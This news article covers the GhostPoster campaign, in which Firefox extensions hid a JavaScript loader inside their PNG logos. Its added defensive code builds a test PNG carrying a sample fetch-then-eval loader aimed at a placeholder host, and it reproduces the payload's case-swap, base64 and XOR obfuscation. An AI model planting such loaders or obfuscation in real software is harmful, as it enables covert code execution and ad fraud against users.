Wednesday, February 4, 2026


Firefox extensions found hiding malware inside image logos

A newly identified campaign, tracked as GhostPoster, hides malicious JavaScript inside the PNG logo images of Firefox browser extensions, a stealthy loading method that lets the malicious code pass as an ordinary image asset.

Security researchers found that the attackers embedded JavaScript within the PNG logo files of malicious Firefox add-ons, some of which recorded more than 50,000 downloads. Once active, the code grants the operators persistent, high-privilege access to the browser, which they use for affiliate link hijacking, tracking injection, and large-scale click and ad fraud.

The hidden script is only a loader: it pulls the main payload from a remote server. To limit the traffic a defender could observe, it fetches the payload on only about one in every 10 attempts.

Researchers identified 17 malicious extensions that either read their own PNG logo to extract and execute the loader or download the payload directly from attacker-controlled infrastructure. While the loading method varies, all of the extensions exhibit the same behavior and communicate with the same backend systems.

The affected extensions fall under popular categories such as VPN services, translation tools, weather apps, screen capture utilities, and ad blockers. One of them, FreeVPN Forever, was flagged after analysis showed it parsing the raw bytes of its logo image to locate a JavaScript snippet hidden there steganographically.
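An extension that reads its own logo's bytes to recover a script suggests a simple check for anyone auditing an installed add-on: walk the PNG's chunk structure and look for places where a decoder would ignore bytes that a script could still read back. The following is an added example written for this article, not code from the GhostPoster extensions or from the researchers. It builds a small valid PNG, plants a constructed loader string in a tEXt chunk and after the IEND chunk (both are assumed hiding spots chosen to exercise the scanner; the page does not detail the real encoding), and then scans the file. Run it with Node.

```javascript
// Added example (not GhostPoster's code): walk a PNG's chunk structure and
// flag the two easiest places to stash bytes that an extension could later
// read back: ancillary chunks (tEXt here) and data after the IEND chunk.
// Where the real extensions hid their loader is not detailed on the page;
// both locations are assumptions used to exercise the scanner.

const PNG_SIG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const CRITICAL = new Set(['IHDR', 'PLTE', 'IDAT', 'IEND']); // IDAT is compressed; not text-scanned here
const SCRIPT_RE = /\b(function|eval|fetch|document|window|XMLHttpRequest|atob)\b|=>/;

// CRC-32 (polynomial 0xEDB88320) over chunk type + data, as PNG specifies.
function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) {
    c ^= b;
    for (let k = 0; k < 8; k++) c = (c >>> 1) ^ (0xedb88320 & -(c & 1));
  }
  return (c ^ 0xffffffff) >>> 0;
}

// Adler-32, needed only to hand-build a zlib stream without requiring zlib.
function adler32(buf) {
  let a = 1, b = 0;
  for (const x of buf) { a = (a + x) % 65521; b = (b + a) % 65521; }
  return ((b << 16) | a) >>> 0;
}

// zlib container holding a single stored (uncompressed) deflate block.
function zlibStored(raw) {
  const blk = Buffer.alloc(5);
  blk[0] = 0x01;                            // BFINAL=1, BTYPE=00 (stored)
  blk.writeUInt16LE(raw.length, 1);
  blk.writeUInt16LE(raw.length ^ 0xffff, 3);
  const ad = Buffer.alloc(4);
  ad.writeUInt32BE(adler32(raw));
  return Buffer.concat([Buffer.from([0x78, 0x01]), blk, raw, ad]);
}

function chunk(type, data) {
  const len = Buffer.alloc(4);
  len.writeUInt32BE(data.length);
  const body = Buffer.concat([Buffer.from(type, 'latin1'), data]);
  const crc = Buffer.alloc(4);
  crc.writeUInt32BE(crc32(body));
  return Buffer.concat([len, body, crc]);
}

// Minimal valid 1x1 RGBA PNG; optional script text goes into a tEXt chunk
// and/or is appended after IEND, where image decoders ignore it.
function buildPng({ textPayload = null, trailer = null } = {}) {
  const ihdr = Buffer.alloc(13);
  ihdr.writeUInt32BE(1, 0);   // width
  ihdr.writeUInt32BE(1, 4);   // height
  ihdr[8] = 8; ihdr[9] = 6;   // 8-bit RGBA; compression/filter/interlace stay 0
  const scanline = Buffer.from([0, 0, 0, 0, 255]); // filter type 0 + one opaque black pixel
  const parts = [PNG_SIG, chunk('IHDR', ihdr)];
  if (textPayload !== null) {
    parts.push(chunk('tEXt', Buffer.from('Comment\0' + textPayload, 'latin1')));
  }
  parts.push(chunk('IDAT', zlibStored(scanline)), chunk('IEND', Buffer.alloc(0)));
  if (trailer !== null) parts.push(Buffer.from(trailer, 'latin1'));
  return Buffer.concat(parts);
}

function looksLikeScript(bytes) {
  return SCRIPT_RE.test(bytes.toString('latin1'));
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function scanPng(buf) {
  const findings = [];
  if (buf.length < 8 || !buf.subarray(0, 8).equals(PNG_SIG)) {
    return [{ where: 'signature', detail: 'not a PNG' }];
  }
  let off = 8;
  while (off + 12 <= buf.length) {
    const len = buf.readUInt32BE(off);
    if (off + 12 + len > buf.length) {
      findings.push({ where: 'chunk@' + off, detail: 'length runs past end of file' });
      return findings;
    }
    const type = buf.toString('latin1', off + 4, off + 8);
    const data = buf.subarray(off + 8, off + 8 + len);
    const crc = buf.readUInt32BE(off + 8 + len);
    if (crc32(buf.subarray(off + 4, off + 8 + len)) !== crc) {
      findings.push({ where: type, detail: 'CRC mismatch' });
    }
    if (!CRITICAL.has(type) && looksLikeScript(data)) {
      findings.push({ where: type, detail: 'script-like text in chunk' });
    }
    off += 12 + len;
    if (type === 'IEND') break;
  }
  if (off < buf.length) {
    const tail = buf.subarray(off);
    findings.push({
      where: 'after-IEND',
      detail: looksLikeScript(tail) ? 'script-like trailer' : tail.length + ' trailing bytes',
    });
  }
  return findings;
}

// Constructed sample loader text; the URL is a placeholder, not a real C2.
const SAMPLE_JS = 'fetch("https://example.invalid/p").then(r => r.text()).then(eval)';

console.log(scanPng(buildPng()));                                          // []
console.log(scanPng(buildPng({ textPayload: SAMPLE_JS, trailer: SAMPLE_JS })));
```

This is a first pass, not a steganography detector: a loader spread across pixel values would survive it. The next steps an auditor would take are to inflate the IDAT data and inspect the decoded pixels for text, and to compare the hash of the packaged logo against the image shown on the extension's listing page.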

The loader activates only after a 48-hour delay and then contacts a hardcoded domain, falling back to a backup domain if the first attempt fails. It stays dormant most of the time, retrieving the payload on roughly 10 percent of its attempts, which keeps its network activity sparse enough to slip past traffic monitoring tools.

Once downloaded, the payload is heavily obfuscated through layered case swapping, base64 encoding, and XOR encryption keyed to the extension's runtime ID. The malware can hijack affiliate links, inject analytics tracking, strip security headers, bypass CAPTCHA protections, and plant invisible iframes for ad fraud that remove themselves after 15 seconds.
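The three layers named above are each reversible, but keying the XOR step to the runtime ID means a payload captured off the wire reads as junk until the analyst knows which extension it was meant for. The following is an added example written for this article, not the GhostPoster payload or its real decoder; the layer order, the key derivation and the sample extension ID are assumptions made for illustration. Inside a Firefox extension the ID would come from `browser.runtime.id`, which for a signed add-on matches the `browser_specific_settings.gecko.id` value in its manifest.

```javascript
// Added example (not the GhostPoster payload): the three reversible layers
// the article names, stacked so that unwrapping needs the extension's
// runtime ID. Layer order and key derivation are assumptions.

// Case swapping is its own inverse; base64's digits, '+', '/' and '=' pass through.
function swapCase(s) {
  return s.replace(/[A-Za-z]/g, ch => (ch === ch.toLowerCase() ? ch.toUpperCase() : ch.toLowerCase()));
}

// Repeating-key XOR; applying it twice with the same key restores the input.
function xorWithKey(bytes, key) {
  const k = Buffer.from(key, 'utf8');
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ k[i % k.length];
  return out;
}

// Operator side: plaintext JS -> XOR with runtime ID -> base64 -> case swap.
function wrap(js, runtimeId) {
  return swapCase(xorWithKey(Buffer.from(js, 'utf8'), runtimeId).toString('base64'));
}

// Extension side: reverse each layer. A wrong ID does not raise an error;
// it simply yields junk bytes.
function unwrap(blob, runtimeId) {
  return xorWithKey(Buffer.from(swapCase(blob), 'base64'), runtimeId).toString('utf8');
}

// Analyst side: junk from a wrong key is almost never printable ASCII that
// also parses as JavaScript, so a short list of candidate IDs (taken from the
// manifests of the extensions under investigation) can be tried in turn.
function isPlausibleJs(text) {
  if (text.trim() === '' || !/^[\x09\x0a\x0d\x20-\x7e]*$/.test(text)) return false;
  try { new Function(text); return true; } catch { return false; } // parse only, never run
}

function recoverRuntimeId(blob, candidateIds) {
  return candidateIds.find(id => isPlausibleJs(unwrap(blob, id))) ?? null;
}

// Constructed sample: a hypothetical extension ID and a snippet of the kind
// of affiliate-rewriting logic the article describes.
const SAMPLE_ID = 'sample-extension@example.invalid';
const SAMPLE_JS = 'document.querySelectorAll("a[href]").forEach(a => { a.href = tag(a.href); });';

const blob = wrap(SAMPLE_JS, SAMPLE_ID);
console.log(blob);
console.log(unwrap(blob, SAMPLE_ID) === SAMPLE_JS);                        // true
console.log(recoverRuntimeId(blob, ['a@example.invalid', 'b@example.invalid', SAMPLE_ID]));
```

The practical point for responders is that the runtime ID is not secret: it is in the extension's manifest, so a captured blob can be decoded offline once the set of candidate extensions is known.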

While it does not steal passwords or redirect users to phishing pages, the campaign poses a serious privacy risk. Researchers warn the infrastructure could deliver more harmful payloads in the future.

Users are advised to remove the listed extensions and to consider resetting passwords for critical accounts. Mozilla, which operates the AMO add-ons site, has confirmed that all identified extensions have been removed and that its detection systems have been updated.

“User safety is something we’ve always prioritized and taken very seriously. Our add-ons team has investigated this report and as a result, has taken action to remove all of these extensions from AMO. We have updated our automated systems to detect and block extensions using similar attacks now and in the future.”
